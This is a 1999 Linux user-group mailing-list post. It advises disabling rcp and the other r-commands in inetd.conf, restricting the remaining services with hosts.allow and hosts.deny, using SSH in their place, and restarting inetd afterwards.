[OLUG] RCP

Tim Russell russell at probe.net
Tue Dec 14 19:22:17 UTC 1999

Of course, the final way to stop RCP and the other "r" commands is to
comment them out in your /etc/inetd.conf file.  Another one of the first
things I do to a new box is comment EVERYTHING out of there except telnet,
ftp, and possibly identd.  Then I restrict those services through the
/etc/hosts.allow and /etc/hosts.deny file.

Rlogin and such might be okay when you're sitting behind a good firewall
(might), but they have no business being enabled on any internet-accessable
machine these days.  Everything you can do with them you can do securely and
encrypted with SSH.

Tim

P.S. Do a "kill -HUP" on your inetd process, or reboot, after changing
inetd.conf.